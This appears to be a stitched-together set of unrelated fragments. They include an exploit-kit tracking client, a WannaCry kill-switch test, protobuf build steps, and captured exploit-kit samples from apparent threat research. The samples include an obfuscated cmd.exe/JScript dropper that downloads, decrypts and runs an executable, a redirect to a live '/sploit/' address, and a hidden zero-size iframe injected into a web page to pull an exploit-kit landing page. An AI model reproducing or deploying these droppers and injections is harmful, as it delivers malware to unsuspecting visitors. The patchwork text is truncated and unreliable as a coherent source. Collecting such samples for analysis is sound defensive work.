An example client library can be found in client.py. To use:
>>> from client import ektracker_client
>>> e = ektracker_client('your_api_key')
>>> e.add_tag('rig', 'rig exploit kit', [ 'http://www.google.com/', 'http://www.test.com' ], ['.*', '[a-f]{1,}'])
Uploading Tag: {'signatures': ['.*', '[a-f]{1,}'], 'references': ['http://www.google.com/', 'http://www.test.com'], 'name': 'rig', 'description': 'rig exploit kit'}
| GET / HTTP/1.1 | |
| Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | |
| Cache-Control: no-cache |
| /* | |
| A simple test to check the behavior of WannaCry's Kill Switch | |
| functionality. Compile with Visual Studio. | |
| @brad_anton | |
| Example Run: | |
| Set DNS to 208.67.222.222 | |
| C:\Users\user\Desktop\WannaCryTest\Debug>WannaCryTest.exe | |
| GOOD: WannaCry would have been aborted! |
Install protobufs from source. If you try to use a newer version, you'll run into an error related to kEmptyString.
sudo apt-get install autoconf automake libtool curl make g++ unzip
wget https://github.com/google/protobuf/archive/v2.5.0.tar.gz
tar -zxvf v2.5.0.tar.gz
cd protobuf-2.5.0/
| cmd.exe /q /c cd /d "%tmp%" && echo function O(l){var w="pow",j=0x24;return A.round((A[w](j,l+1)-A.random()*A[w](j,l))).toString(j).slice(1)};function V(k){var y=a(e+"."+e+"Request.5.1");y.setProxy(n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y./**/WaitForResponse();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=255,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e.charCodeAt(b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript,o="Object",A=Math,S="etofile",a=Function("b","return u.Create"+o+"(b)");P=(""+u).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=u.Arguments,e="WinH"+"TTP",j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=u[P+"FullName"],E="."+p;s.Type=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v["charCo"+"deAt"](027+v[M]("PE\x00\x00"));s.WriteText |
| $("body").remove();$("html").append("body").html("<div style=\"\"></div>");window.location.href = "http://194.58.38.103/sploit/flow3.php" |
| <HEAD> | |
| </HEAD> | |
| <BODY BGCOLOR="WHITE"> | |
| <CENTER> | |
| <iframe width="0" scrolling="no" height="0" frameborder="0" src="" seamless="seamless"> | |
| <H1>A Simple Sample Web Page</H1> | |
| If you would like to make a link or bookmark to this page, the URL is:<BR> http://sheldonbrown.com/web_sample1.html |
| <HEAD> | |
| </HEAD> | |
| <BODY BGCOLOR="WHITE"> | |
| <CENTER> | |
| <iframe width="0" scrolling="no" height="0" frameborder="0" src="http://name.THEDISCOVEREDARTIST.COM/?oq=[REDACTED]&ct=diamond&q=[REDACTED]&qtuif=2421" seamless="seamless"> | |
| <H1>A Simple Sample Web Page</H1> | |
| If you would like to make a link or bookmark to this page, the URL is:<BR> http://sheldonbrown.com/web_sample1.html |
| $(document).ready(function() | |
| { | |
| $("body").hide(); | |
| var f=new XMLHttpRequest(); | |
| f.open("GET",document.location,false); | |
| f.send(null); | |
| var g=f.getAllResponseHeaders().toLowerCase(); | |
| var b="GoogleAnalyticsObject"; | |
| var c=("document","script","//www.google-analytics.com/analytics.js"); | |
| c=("create","UA-3188658-1","auto"); |